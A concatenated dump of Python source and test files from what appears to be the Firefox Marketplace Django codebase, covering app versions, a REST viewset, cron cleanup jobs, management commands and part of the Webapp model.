eq_(d['major'], 3)
eq_(d['minor1'], 5)
eq_(d['minor2'], 0)
eq_(d['minor3'], 0)
eq_(d['alpha'], 'a')
eq_(d['alpha_ver'], 1)
eq_(d['pre'], 'pre')
eq_(d['pre_ver'], 2)
class TestVersion(BaseUploadTest, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'platform_all')
def setUp(self):
self._rename = path.path.rename
self.version = Version.objects.latest('id')
def test_developer_name(self):
version = Version.objects.latest('id')
version._developer_name = u'M€lâ'
eq_(version.developer_name, u'M€lâ')
eq_(Version(_developer_name=u'M€lâ').developer_name, u'M€lâ')
@mock.patch('files.utils.parse_addon')
def test_developer_name_from_upload(self, parse_addon):
parse_addon.return_value = {
'version': '42.0',
'developer_name': u'Mýself'
}
addon = Addon.objects.get(pk=337141)
# Note: we need a valid FileUpload instance, but in the end we are not
# using its contents since we are mocking parse_addon().
path = os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
'addons', 'mozball.webapp')
upload = self.get_upload(abspath=path, is_webapp=True)
platform = Platform.objects.get(pk=amo.PLATFORM_ALL.id)
version = Version.from_upload(upload, addon, [platform])
eq_(version.version, '42.0')
eq_(version.developer_name, u'Mýself')
@mock.patch('files.utils.parse_addon')
def test_long_developer_name_from_upload(self, parse_addon):
truncated_developer_name = u'ý' * 255
long_developer_name = truncated_developer_name + u'àààà'
parse_addon.return_value = {
'version': '42.1',
'developer_name': long_developer_name
}
addon = Addon.objects.get(pk=337141)
# Note: we need a valid FileUpload instance, but in the end we are not
# using its contents since we are mocking parse_addon().
path = os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
'addons', 'mozball.webapp')
upload = self.get_upload(abspath=path, is_webapp=True)
platform = Platform.objects.get(pk=amo.PLATFORM_ALL.id)
version = Version.from_upload(upload, addon, [platform])
eq_(version.version, '42.1')
eq_(version.developer_name, truncated_developer_name)
def test_is_privileged_hosted_app(self):
addon = Addon.objects.get(pk=337141)
eq_(addon.current_version.is_privileged, False)
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_is_privileged_app(self, get_manifest_json):
get_manifest_json.return_value = {
'type': 'privileged'
}
addon = Addon.objects.get(pk=337141)
addon.update(is_packaged=True)
eq_(addon.current_version.is_privileged, True)
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_is_privileged_non_privileged_app(self, get_manifest_json):
get_manifest_json.return_value = {
}
addon = Addon.objects.get(pk=337141)
addon.update(is_packaged=True)
eq_(addon.current_version.is_privileged, False)
def test_delete(self):
version = Version.objects.all()[0]
eq_(Version.objects.count(), 1)
version.delete()
eq_(Version.objects.count(), 0)
eq_(Version.with_deleted.count(), 1)
# Ensure deleted version's files get disabled.
eq_(version.all_files[0].status, amo.STATUS_DISABLED)
def test_compatible_apps(self):
# TODO: Do apps have compatible_apps?
raise SkipTest('Figure out if we need `compatible_apps` or remove.')
assert amo.FIREFOX in self.version.compatible_apps, (
'Missing compatible apps: %s' % self.version.compatible_apps)
def test_supported_platforms(self):
assert amo.PLATFORM_ALL in self.version.supported_platforms, (
'Missing PLATFORM_ALL')
def test_major_minor(self):
"""Check that major/minor/alpha is getting set."""
v = Version(version='3.0.12b2')
eq_(v.major, 3)
eq_(v.minor1, 0)
eq_(v.minor2, 12)
eq_(v.minor3, None)
eq_(v.alpha, 'b')
eq_(v.alpha_ver, 2)
v = Version(version='3.6.1apre2+')
eq_(v.major, 3)
eq_(v.minor1, 6)
eq_(v.minor2, 1)
eq_(v.alpha, 'a')
eq_(v.pre, 'pre')
eq_(v.pre_ver, 2)
v = Version(version='')
eq_(v.major, None)
eq_(v.minor1, None)
eq_(v.minor2, None)
eq_(v.minor3, None)
def test_has_files(self):
assert self.version.has_files, 'Version with files not recognized.'
self.version.files.all().delete()
self.version = Version.objects.latest('id')
assert not self.version.has_files, (
'Version without files not recognized.')
def _get_version(self, status):
v = Version()
v.all_files = [mock.Mock()]
v.all_files[0].status = status
return v
@mock.patch('versions.models.storage')
def test_version_delete(self, storage_mock):
self.version.delete()
addon = Addon.objects.get(pk=337141)
assert addon
assert not Version.objects.filter(addon=addon).exists()
assert Version.with_deleted.filter(addon=addon).exists()
assert not storage_mock.delete.called
@mock.patch('versions.models.storage')
def test_packaged_version_delete(self, storage_mock):
addon = Addon.objects.get(pk=337141)
addon.update(is_packaged=True)
version = addon.current_version
version.delete()
assert not Version.objects.filter(addon=addon).exists()
assert Version.with_deleted.filter(addon=addon).exists()
assert storage_mock.delete.called
def test_version_delete_files(self):
eq_(self.version.files.all()[0].status, amo.STATUS_PUBLIC)
self.version.delete()
eq_(self.version.files.all()[0].status, amo.STATUS_DISABLED)
@mock.patch('files.models.File.hide_disabled_file')
def test_new_version_disable_old_unreviewed(self, hide_mock):
addon = Addon.objects.get(pk=337141)
# The status doesn't change for public files.
qs = File.objects.filter(version=addon.current_version)
eq_(qs.all()[0].status, amo.STATUS_PUBLIC)
Version.objects.create(addon=addon)
eq_(qs.all()[0].status, amo.STATUS_PUBLIC)
assert not hide_mock.called
qs.update(status=amo.STATUS_PENDING)
version = Version.objects.create(addon=addon)
version.disable_old_files()
eq_(qs.all()[0].status, amo.STATUS_DISABLED)
assert hide_mock.called
def test_large_version_int(self):
# This version will fail to be written to the version_int
# table because the resulting int is bigger than mysql bigint.
version = Version(addon=Addon.objects.get(pk=337141))
version.version = '9223372036854775807'
version.save()
eq_(version.version_int, None)
def _reset_version(self, version):
version.all_files[0].status = amo.STATUS_PUBLIC
version.deleted = False
def test_version_is_public(self):
addon = Addon.objects.get(id=337141)
version = amo.tests.version_factory(addon=addon)
# Base test. Everything is in order, the version should be public.
eq_(version.is_public(), True)
# Non-public file.
self._reset_version(version)
version.all_files[0].status = amo.STATUS_DISABLED
eq_(version.is_public(), False)
# Deleted version.
self._reset_version(version)
version.deleted = True
eq_(version.is_public(), False)
# Non-public addon.
self._reset_version(version)
with mock.patch('addons.models.Addon.is_public') as is_addon_public:
is_addon_public.return_value = False
eq_(version.is_public(), False)
def test_app_feature_creation_app(self):
app = Addon.objects.create(type=amo.ADDON_WEBAPP)
ver = Version.objects.create(addon=app)
assert ver.features, 'AppFeatures was not created with version.'
class TestApplicationsVersions(amo.tests.TestCase):
def setUp(self):
self.version_kw = dict(min_app_version='5.0', max_app_version='6.*')
def test_repr_when_compatible(self):
addon = addon_factory(version_kw=self.version_kw)
version = addon.current_version
eq_(version.apps.all()[0].__unicode__(), 'Firefox 5.0 - 6.*')
def test_repr_when_unicode(self):
addon = addon_factory(version_kw=dict(min_app_version=u'ك',
max_app_version=u'ك'))
version = addon.current_version
eq_(unicode(version.apps.all()[0]), u'Firefox ك - ك')
########NEW FILE########
__FILENAME__ = test_serializers
from django.core.urlresolvers import reverse
from nose.tools import eq_, ok_
from test_utils import RequestFactory
from amo.tests import app_factory, TestCase
from versions.models import Version
from mkt.versions.serializers import VersionSerializer
class TestVersionSerializer(TestCase):
def setUp(self):
self.app = app_factory()
self.features = self.app.current_version.features
self.request = RequestFactory().get('/')
self.serializer = VersionSerializer(context={'request': self.request})
def native(self, obj=None, **kwargs):
if not obj:
obj = self.app.current_version
obj.update(**kwargs)
return self.serializer.to_native(obj)
def test_renamed_fields(self):
native = self.native()
removed_keys = self.serializer.Meta.field_rename.keys()
added_keys = self.serializer.Meta.field_rename.values()
ok_(all(not k in native for k in removed_keys))
ok_(all(k in native for k in added_keys))
def test_addon(self):
eq_(self.native()['app'], reverse('app-detail',
kwargs={'pk': self.app.pk}))
def test_is_current_version(self):
old_version = Version.objects.create(addon=self.app, version='0.1')
ok_(self.native()['is_current_version'])
ok_(not self.native(obj=old_version)['is_current_version'])
def test_features(self, **kwargs):
if kwargs:
self.features.update(**kwargs)
native = self.native()
for key in dir(self.features):
if key.startswith('has_') and getattr(self.features, key):
ok_(key.replace('has_', '') in native['features'])
def test_features_updated(self):
self.test_features(has_fm=True)
########NEW FILE########
__FILENAME__ = test_views
import json
from django.core.urlresolvers import reverse
from nose.tools import eq_, ok_
from rest_framework.reverse import reverse as rest_reverse
from test_utils import RequestFactory
import amo
from amo.tests import app_factory
from mkt.api.base import get_url
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from versions.models import Version
class TestVersionViewSet(RestOAuth):
fixtures = fixture('user_2519')
def setUp(self):
self.app = app_factory()
self.app_url = get_url('app', self.app.pk)
self.version = self.app.current_version
self.request = RequestFactory()
super(TestVersionViewSet, self).setUp()
def test_has_cors(self):
url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
self.assertCORS(self.client.get(url), 'get', 'put', 'patch')
def test_get(self, version=None, **kwargs):
if not version:
version = self.version
url = rest_reverse('version-detail', kwargs={'pk': version.pk})
res = self.client.get(url, kwargs)
data = res.data
features = data['features']
eq_(res.status_code, 200)
# Test values on Version object.
eq_(data['version'], version.version)
eq_(data['developer_name'], version.developer_name)
eq_(data['is_current_version'],
version == self.app.current_version)
eq_(data['app'], reverse('app-detail',
kwargs={'pk': self.app.pk}))
for key in features:
ok_(getattr(version.features, 'has_' + key))
def test_get_non_public(self):
self.app.update(status=amo.STATUS_PENDING)
url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
res = self.client.get(url)
eq_(res.status_code, 403)
res = self.anon.get(url)
eq_(res.status_code, 403)
def test_get_reviewer_non_public(self):
self.app.update(status=amo.STATUS_PENDING)
self.grant_permission(self.profile, 'Apps:Review')
url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
res = self.client.get(url)
eq_(res.status_code, 200)
def test_get_owner_non_public(self):
self.app.update(status=amo.STATUS_PENDING)
self.app.addonuser_set.create(user=self.user)
url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
res = self.client.get(url)
eq_(res.status_code, 200)
def test_get_updated_data(self):
version = Version.objects.create(addon=self.app, version='1.2')
version.features.update(has_mp3=True, has_fm=True)
self.app.update(_latest_version=version, _current_version=version)
self.test_get() # Test old version
self.test_get(version=version) # Test new version
def patch(self, features=None):
data = {
'features': features or ['fm', 'mp3'],
'developer_name': "Cee's Vans"
}
url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
# Uses PUT because Django's test client didn't support PATCH until
# bug #17797 was resolved.
res = self.client.put(url, data=json.dumps(data),
content_type='application/json')
return data, res
def test_patch(self):
self.app.addonuser_set.create(user=self.user)
data, res = self.patch()
eq_(res.status_code, 200)
self.assertSetEqual(self.version.features.to_keys(),
['has_' + f for f in data['features']])
def test_patch_bad_features(self):
self.app.addonuser_set.create(user=self.user)
data, res = self.patch(features=['bad'])
eq_(res.status_code, 400)
def test_patch_no_permission(self):
data, res = self.patch()
eq_(res.status_code, 403)
def test_patch_reviewer_permission(self):
self.grant_permission(self.profile, 'Apps:Review')
data, res = self.patch()
eq_(res.status_code, 200)
def test_get_deleted_app(self):
url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
self.app.delete()
res = self.client.get(url)
eq_(res.status_code, 404)
def test_get_non_app(self):
self.app.update(type=amo.ADDON_PERSONA)
url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
res = self.client.get(url)
eq_(res.status_code, 404)
def test_delete(self):
url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
res = self.client.delete(url)
eq_(res.status_code, 405)
########NEW FILE########
__FILENAME__ = urls
from rest_framework import routers
from .views import VersionViewSet
router = routers.DefaultRouter()
router.register(r'versions', VersionViewSet)
urlpatterns = router.urls
########NEW FILE########
__FILENAME__ = views
from rest_framework import mixins, viewsets
from rest_framework.exceptions import ParseError
import amo
from mkt.api.authorization import (AllowReadOnlyIfPublic, AllowRelatedAppOwner,
AnyOf, GroupPermission)
from mkt.api.base import CORSMixin
from mkt.constants import APP_FEATURES
from mkt.versions.serializers import VersionSerializer
from versions.models import Version
class VersionViewSet(CORSMixin, mixins.RetrieveModelMixin,
mixins.UpdateModelMixin, viewsets.GenericViewSet):
queryset = Version.objects.filter(
addon__type=amo.ADDON_WEBAPP).exclude(addon__status=amo.STATUS_DELETED)
serializer_class = VersionSerializer
authorization_classes = []
permission_classes = [AnyOf(AllowRelatedAppOwner,
GroupPermission('Apps', 'Review'),
AllowReadOnlyIfPublic)]
cors_allowed_methods = ['get', 'patch', 'put']
def update(self, request, *args, **kwargs):
"""
Allow a version's features to be updated.
"""
obj = self.get_object()
# Update features if they are provided.
if 'features' in request.DATA:
# Raise an exception if any invalid features are passed.
invalid = [f for f in request.DATA['features'] if f.upper() not in
APP_FEATURES.keys()]
if any(invalid):
raise ParseError('Invalid feature(s): %s' % ', '.join(invalid))
# Update the value of each feature (note: a feature not present in
# the form data is assumed to be False)
data = {}
for key, name in APP_FEATURES.items():
field_name = 'has_' + key.lower()
data[field_name] = key.lower() in request.DATA['features']
obj.features.update(**data)
del request.DATA['features']
return super(VersionViewSet, self).update(request, *args, **kwargs)
########NEW FILE########
__FILENAME__ = cron
import os
import shutil
import stat
import time
from datetime import datetime, timedelta
from django.conf import settings
import commonware.log
import cronjobs
from celery import chord
import amo
from amo.utils import chunked
from devhub.models import ActivityLog
from mkt.api.models import Nonce
from .models import Installed, Webapp
from .tasks import (dump_user_installs, update_downloads, update_trending,
zip_users)
log = commonware.log.getLogger('z.cron')
@cronjobs.register
def clean_old_signed(seconds=60 * 60):
"""Clean out apps signed for reviewers."""
log.info('Removing old apps signed for reviewers')
root = settings.SIGNED_APPS_REVIEWER_PATH
for path in os.listdir(root):
full = os.path.join(root, path)
age = time.time() - os.stat(full)[stat.ST_ATIME]
if age > seconds:
log.debug('Removing signed app: %s, %dsecs old.' % (full, age))
shutil.rmtree(full)
@cronjobs.register
def update_app_trending():
"""
Update trending for all apps.
Spread these tasks out successively by 15 seconds so they don't hit
Monolith all at once.
"""
chunk_size = 50
seconds_between = 15
all_ids = list(Webapp.objects.filter(status=amo.STATUS_PUBLIC)
.values_list('id', flat=True))
countdown = 0
for ids in chunked(all_ids, chunk_size):
update_trending.delay(ids, countdown=countdown)
countdown += seconds_between
@cronjobs.register
def dump_user_installs_cron():
"""
Sets up tasks to do user install dumps.
"""
chunk_size = 100
# Get valid users to dump.
user_ids = set(Installed.objects.filter(addon__type=amo.ADDON_WEBAPP)
.values_list('user', flat=True))
# Remove old dump data before running.
user_dir = os.path.join(settings.DUMPED_USERS_PATH, 'users')
if os.path.exists(user_dir):
shutil.rmtree(user_dir)
grouping = []
for chunk in chunked(user_ids, chunk_size):
grouping.append(dump_user_installs.subtask(args=[chunk]))
post = zip_users.subtask(immutable=True)
ts = chord(grouping, post)
ts.apply_async()
@cronjobs.register
def update_app_downloads():
"""
Update download/install stats for all apps.
Spread these tasks out successively by `seconds_between` seconds so they
don't hit Monolith all at once.
"""
chunk_size = 50
seconds_between = 2
all_ids = list(Webapp.objects.filter(status=amo.STATUS_PUBLIC)
.values_list('id', flat=True))
countdown = 0
for ids in chunked(all_ids, chunk_size):
update_downloads.delay(ids, countdown=countdown)
countdown += seconds_between
@cronjobs.register
def mkt_gc(**kw):
"""Site-wide garbage collections."""
days_ago = lambda days: datetime.today() - timedelta(days=days)
log.debug('Collecting data to delete')
logs = (ActivityLog.objects.filter(created__lt=days_ago(90))
.exclude(action__in=amo.LOG_KEEP).values_list('id', flat=True))
for chunk in chunked(logs, 100):
chunk.sort()
log.debug('Deleting log entries: %s' % str(chunk))
amo.tasks.delete_logs.delay(chunk)
# Clear oauth nonce rows. These expire after 10 minutes but we're just
# clearing those that are more than 1 day old.
Nonce.objects.filter(created__lt=days_ago(1)).delete()
# Delete the dump apps over 30 days.
for app in os.listdir(settings.DUMPED_APPS_PATH):
app = os.path.join(settings.DUMPED_APPS_PATH, app)
if (os.stat(app).st_mtime < time.time() -
settings.DUMPED_APPS_DAYS_DELETE):
log.debug('Deleting old tarball: {0}'.format(app))
os.remove(app)
# Delete the dumped user installs over 30 days.
tarball_path = os.path.join(settings.DUMPED_USERS_PATH, 'tarballs')
for filename in os.listdir(tarball_path):
filepath = os.path.join(tarball_path, filename)
if (os.stat(filepath).st_mtime < time.time() -
settings.DUMPED_USERS_DAYS_DELETE):
log.debug('Deleting old tarball: {0}'.format(filepath))
os.remove(filepath)
########NEW FILE########
__FILENAME__ = decorators
import functools
from django import http
from django.shortcuts import get_object_or_404
from mkt.webapps.models import Webapp
import commonware.log
log = commonware.log.getLogger('mkt.purchase')
def app_view(f, qs=Webapp.objects.all):
@functools.wraps(f)
def wrapper(request, addon_id=None, app_slug=None, *args,
**kw):
"""Provides an addon given either an addon_id or app_slug."""
assert addon_id or app_slug, 'Must provide addon_id or app_slug'
get = lambda **kw: get_object_or_404(qs(), **kw)
if addon_id and addon_id.isdigit():
addon = get(id=addon_id)
# Don't get in an infinite loop if addon.slug.isdigit().
if addon.slug != addon_id:
url = request.path.replace(addon_id, addon.slug)
if request.GET:
url += '?' + request.GET.urlencode()
return http.HttpResponsePermanentRedirect(url)
elif addon_id:
addon = get(slug=addon_id)
elif app_slug:
addon = get(app_slug=app_slug)
return f(request, addon, *args, **kw)
return wrapper
def app_view_factory(qs):
# Don't evaluate qs or the locale will get stuck on whatever the server
# starts with. The webapp_view() decorator will call qs with no arguments
# before doing anything, so lambdas are ok.
# GOOD: Webapp.objects.valid
# GOOD: lambda: Webapp.objects.valid().filter(type=1)
# BAD: Webapp.objects.valid()
return functools.partial(app_view, qs=qs)
########NEW FILE########
__FILENAME__ = export_data
from django.core.management.base import BaseCommand
from mkt.webapps.tasks import export_data
class Command(BaseCommand):
help = 'Export our data as a tgz for third-parties'
def handle(self, *args, **kwargs):
# Execute as a celery task so we get the right permissions.
export_data.delay()
########NEW FILE########
__FILENAME__ = generate_receipts
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
import json
import os
import tempfile
import time
import amo
from addons.models import Addon
from users.models import UserProfile
from mkt.webapps.models import Installed
class Command(BaseCommand):
"""
Used to generate a whole pile of receipts that can be used for
load testing. The receipts need to be generated because they use
the receipt key for the particular server.
This will create users, addons and installed records, so that the
verify script can be load tested properly.
These records are placed into a JSON file. Run the delete command
to clean these out afterwards.
"""
option_list = BaseCommand.option_list + (
make_option('--action', action='store', type='string',
dest='action', help='Action: create, delete.'),
make_option('--dir', action='store', type='string',
dest='dir', help='Directory to read or write data.'),
make_option('--number', action='store', type='int', default='10',
dest='number', help='Number of receipts, default: %default')
)
def filename(self, rest):
return os.path.join(self.dest, rest)
def handle(self, *args, **options):
self.dest = options.get('dir')
action = options.get('action')
if action not in ['create', 'delete']:
raise CommandError('Action: create or delete')
if not self.dest:
self.dest = tempfile.mkdtemp()
print '--dir not specified, using: %s' % self.dest
if not os.path.exists(self.dest):
print 'Creating output directory, %s' % self.dest
os.makedirs(self.dest)
self.number = options.get('number')
return getattr(self, action)()
def create(self):
"""
Creates users, webapps and installed records. Outputs the receipts
and created records into the supplied directory.
"""
created = {'users': [], 'webapps': [], 'installed': []}
number = self.number
stamp = str(time.time())
for x in xrange(number):
name = 'generate-receipt-%s-%s' % (stamp, x)
user = UserProfile.objects.create(email='%[email protected]' % name,
username=name)
created['users'].append(user.pk)
for x in xrange(number):
name = 'generate-receipt-%s-%s' % (stamp, x)
addon = Addon.objects.create(name=name,
type=amo.ADDON_WEBAPP,
manifest_url='http://a.com/m.webapp')
created['webapps'].append(addon.pk)
for x in xrange(number):
installed = Installed.objects.create(
addon_id=created['webapps'][x],
user_id=created['users'][x])
created['installed'].append(installed.pk)
filename = self.filename('%s.%s.receipt' %
(created['webapps'][x], x))
open(filename, 'w').write(installed.receipt)
open(self.filename('created.json'), 'w').write(json.dumps(created))
def delete(self):
"""Cleans up once the load testing is run and deletes the records."""
data = json.loads(open(self.filename('created.json'), 'r').read())
for obj, model in (['installed', Installed],
['webapps', Addon],
['users', UserProfile]):
model.objects.filter(pk__in=data[obj]).delete()
########NEW FILE########
__FILENAME__ = list_packaged_apps
from optparse import make_option
from django.core.exceptions import ObjectDoesNotExist
from django.core.management.base import BaseCommand
import amo
from files.models import File
HELP = 'List all Marketplace packaged apps'
statuses = {'pending': amo.STATUS_PENDING,
'public': amo.STATUS_PUBLIC,
'approved': amo.STATUS_PUBLIC_WAITING,
'rejected': amo.STATUS_DISABLED}
class Command(BaseCommand):
"""
Usage:
python manage.py list_packaged_apps --status=<status>
"""
option_list = BaseCommand.option_list + (
make_option('--status',
choices=statuses.keys(),
help='Status of packaged-app files'),
)
help = HELP
def handle(self, *args, **kwargs):
files = File.objects.filter(version__addon__type=amo.ADDON_WEBAPP,
version__addon__is_packaged=True)
if kwargs.get('status'):
files = files.filter(status=statuses[kwargs['status']])
filenames = []
for f in files:
try:
filenames.append(f.file_path)
except ObjectDoesNotExist:
pass
print '\n'.join(filenames)
########NEW FILE########
__FILENAME__ = sign_apps
import logging
from optparse import make_option
from django.core.management.base import BaseCommand
from celery.task.sets import TaskSet
import amo
from addons.models import Webapp
from lib.crypto.packaged import sign
HELP = """\
Start tasks to re-sign web apps.
To specify which webapps to sign:
`--webapps=1234,5678,...9012`
If omitted, all signed apps will be re-signed.
"""
log = logging.getLogger('z.addons')
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--webapps',
help='Webapp ids to process. Use commas to separate '
'multiple ids.'),
)
help = HELP
def handle(self, *args, **kw):
qs = Webapp.objects.filter(is_packaged=True, status=amo.STATUS_PUBLIC)
if kw['webapps']:
pks = [int(a.strip()) for a in kw['webapps'].split(',')]
qs = qs.filter(pk__in=pks)
ts = [sign.subtask(args=[webapp.current_version.pk],
kwargs={'resign': True}) for webapp in qs]
TaskSet(ts).apply_async()
########NEW FILE########
__FILENAME__ = models
# -*- coding: utf-8 -*-
import datetime
import hashlib
import json
import math
import os
import urlparse
import uuid
from collections import defaultdict
from operator import attrgetter
from django.conf import settings
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import NoReverseMatch
from django.core.urlresolvers import reverse
from django.db import models
from django.db.models import Max, Min, Q, signals as dbsignals
from django.dispatch import receiver
import commonware.log
import json_field
import waffle
from cache_nuggets.lib import memoize, memoize_key
from elasticutils.contrib.django import F, Indexable, MappingType
from tower import ugettext as _
import amo
import amo.models
import mkt
from access.acl import action_allowed, check_reviewer
from addons import query
from addons.models import (Addon, AddonDeviceType, AddonUpsell,
attach_categories, attach_devices, attach_prices,
attach_tags, attach_translations, Category)
from addons.signals import version_changed
from amo.decorators import skip_cache, write
from amo.helpers import absolutify
from amo.storage_utils import copy_stored_file
from amo.utils import JSONEncoder, smart_path, to_language, urlparams
from constants.applications import DEVICE_GAIA, DEVICE_TYPES
from constants.payments import PROVIDER_CHOICES
from files.models import File, nfd_str, Platform
from files.utils import parse_addon, WebAppParser
from lib.crypto import packaged
from lib.iarc.client import get_iarc_client
from lib.iarc.utils import (get_iarc_app_title, render_xml,
REVERSE_DESC_MAPPING, REVERSE_INTERACTIVES_MAPPING)
from mkt.constants import APP_FEATURES, apps
from mkt.developers.models import AddonPaymentAccount
from mkt.regions.utils import parse_region
from mkt.search.utils import S
from mkt.site.models import DynamicBoolFieldsMixin
from mkt.webapps.utils import (dehydrate_content_rating, dehydrate_descriptors,
dehydrate_interactives, get_locale_properties,
get_supported_locales)
from mkt.prices.models import AddonPremium
from translations.fields import PurifiedField, save_signal
from versions.models import Version
log = commonware.log.getLogger('z.addons')
def reverse_version(version):
"""
The try/except AttributeError allows this to be used where the input is
ambiguous, and could be either an already-reversed URL or a Version object.
"""
if version:
try:
return reverse('version-detail', kwargs={'pk': version.pk})
except AttributeError:
return version
return
class WebappManager(amo.models.ManagerBase):
def __init__(self, include_deleted=False):
amo.models.ManagerBase.__init__(self)
self.include_deleted = include_deleted
def get_query_set(self):
qs = super(WebappManager, self).get_query_set()
qs = qs._clone(klass=query.IndexQuerySet).filter(
type=amo.ADDON_WEBAPP)
if not self.include_deleted:
qs = qs.exclude(status=amo.STATUS_DELETED)
return qs.transform(Webapp.transformer)
def valid(self):
return self.filter(status__in=amo.LISTED_STATUSES,
disabled_by_user=False)
def reviewed(self):
return self.filter(status__in=amo.REVIEWED_STATUSES)
def visible(self):
return self.filter(status=amo.STATUS_PUBLIC, disabled_by_user=False)
def top_free(self, listed=True):
qs = self.visible() if listed else self
return (qs.filter(premium_type__in=amo.ADDON_FREES)
.order_by('-weekly_downloads')
.with_index(addons='downloads_type_idx'))
def top_paid(self, listed=True):
qs = self.visible() if listed else self
return (qs.filter(premium_type__in=amo.ADDON_PREMIUMS)
.order_by('-weekly_downloads')
.with_index(addons='downloads_type_idx'))
@skip_cache
def pending(self):
# - Holding
# ** Approved -- PUBLIC
# ** Unapproved -- PENDING
# - Open
# ** Reviewed -- PUBLIC
# ** Unreviewed -- LITE
# ** Rejected -- REJECTED
return self.filter(status=amo.WEBAPPS_UNREVIEWED_STATUS)
@skip_cache
def pending_in_region(self, region):
"""
Apps that have been approved by reviewers but unapproved by
reviewers in special regions (e.g., China).
"""
region = parse_region(region)
column_prefix = '_geodata__region_%s' % region.slug
return self.filter(**{
'status__in': amo.WEBAPPS_APPROVED_STATUSES,
'disabled_by_user': False,
'escalationqueue__isnull': True,
'%s_status' % column_prefix: amo.STATUS_PENDING,
}).order_by('-%s_nominated' % column_prefix)
def rated(self):
"""IARC."""
if waffle.switch_is_active('iarc'):
return self.exclude(content_ratings__isnull=True)
return self
def by_identifier(self, identifier):
"""
Look up a single app by its `id` or `app_slug`.
If the identifier is coercable into an integer, we first check for an
ID match, falling back to a slug check (probably not necessary, as
there is validation preventing numeric slugs). Otherwise, we only look
for a slug match.
"""
try:
return self.get(id=identifier)
except (ObjectDoesNotExist, ValueError):
return self.get(app_slug=identifier)
# We use super(Addon, self) on purpose to override expectations in Addon that
# are not true for Webapp. Webapp is just inheriting so it can share the db
# table.
class Webapp(Addon):
objects = WebappManager()
with_deleted = WebappManager(include_deleted=True)
class PayAccountDoesNotExist(Exception):
"""The app has no payment account for the query."""
class Meta:
proxy = True
def save(self, **kw):
# Make sure we have the right type.
self.type = amo.ADDON_WEBAPP
self.clean_slug(slug_field='app_slug')
self.assign_uuid()
creating = not self.id
super(Addon, self).save(**kw)
if creating:
# Set the slug once we have an id to keep things in order.
self.update(slug='app-%s' % self.id)
# Create Geodata object (a 1-to-1 relationship).
if not hasattr(self, '_geodata'):
Geodata.objects.create(addon=self)
@staticmethod
def transformer(apps):
if not apps:
return
apps_dict = dict((a.id, a) for a in apps)
# Only the parts relevant for Webapps are copied over from Addon. In
# particular this avoids fetching categories and listed_authors, which
# isn't useful in most parts of the Marketplace.
# Set _latest_version, _current_version
Addon.attach_related_versions(apps, apps_dict)
# Attach previews. Don't use transforms, the only one present is for
# translations and Previews don't have captions in the Marketplace, and
# therefore don't have translations.
Addon.attach_previews(apps, apps_dict, no_transforms=True)
# Attach prices.
Addon.attach_prices(apps, apps_dict)
# FIXME: re-use attach_devices instead ?
for adt in AddonDeviceType.objects.filter(addon__in=apps_dict):
if not getattr(apps_dict[adt.addon_id], '_device_types', None):
apps_dict[adt.addon_id]._device_types = []
apps_dict[adt.addon_id]._device_types.append(
DEVICE_TYPES[adt.device_type])
# FIXME: attach geodata and content ratings. Maybe in a different
# transformer that would then be called automatically for the API ?
@staticmethod
def version_and_file_transformer(apps):
"""Attach all the versions and files to the apps."""
# Don't just return an empty list, it will break code that expects
# a query object
if not len(apps):
return apps
ids = set(app.id for app in apps)
versions = (Version.objects.no_cache().filter(addon__in=ids)
.select_related('addon'))
vids = [v.id for v in versions]
files = (File.objects.no_cache().filter(version__in=vids)
.select_related('version'))
# Attach the files to the versions.
f_dict = dict((k, list(vs)) for k, vs in
amo.utils.sorted_groupby(files, 'version_id'))
for version in versions:
version.all_files = f_dict.get(version.id, [])
# Attach the versions to the apps.
v_dict = dict((k, list(vs)) for k, vs in
amo.utils.sorted_groupby(versions, 'addon_id'))
for app in apps:
app.all_versions = v_dict.get(app.id, [])
return apps
@staticmethod
def indexing_transformer(apps):
"""Attach everything we need to index apps."""
transforms = (attach_categories, attach_devices, attach_prices,
attach_tags, attach_translations)
for t in transforms:
qs = apps.transform(t)
return qs
@property
def geodata(self):
if hasattr(self, '_geodata'):
return self._geodata
return Geodata.objects.get_or_create(addon=self)[0]
def get_api_url(self, action=None, api=None, resource=None, pk=False):
"""Reverse a URL for the API."""
if pk:
key = self.pk
else:
key = self.app_slug
return reverse('app-detail', kwargs={'pk': key})
def get_url_path(self, more=False, add_prefix=True, src=None):
# We won't have to do this when Marketplace absorbs all apps views,
# but for now pretend you didn't see this.
try:
url_ = reverse('detail', args=[self.app_slug],
add_prefix=add_prefix)
except NoReverseMatch:
# Fall back to old details page until the views get ported.
return super(Webapp, self).get_url_path(more=more,
add_prefix=add_prefix)
else:
if src is not None:
return urlparams(url_, src=src)
return url_
def get_detail_url(self, action=None):
"""Reverse URLs for 'detail', 'details.record', etc."""
return reverse(('detail.%s' % action) if action else 'detail',
args=[self.app_slug])
def get_purchase_url(self, action=None, args=None):
"""Reverse URLs for 'purchase', 'purchase.done', etc."""
return reverse(('purchase.%s' % action) if action else 'purchase',
args=[self.app_slug] + (args or []))
def get_dev_url(self, action='edit', args=None, prefix_only=False):
# Either link to the "new" Marketplace Developer Hub or the old one.
args = args or []
prefix = 'mkt.developers'
view_name = ('%s.%s' if prefix_only else '%s.apps.%s')
return reverse(view_name % (prefix, action),
args=[self.app_slug] + args)
def get_ratings_url(self, action='list', args=None, add_prefix=True):
"""Reverse URLs for 'ratings.list', 'ratings.add', etc."""
return reverse(('ratings.%s' % action),
args=[self.app_slug] + (args or []),
add_prefix=add_prefix)
def get_stats_url(self):
return reverse('commonplace.stats.app_dashboard', args=[self.app_slug])
def get_comm_thread_url(self):
return reverse('commonplace.commbadge.app_dashboard',
args=[self.app_slug])
@staticmethod
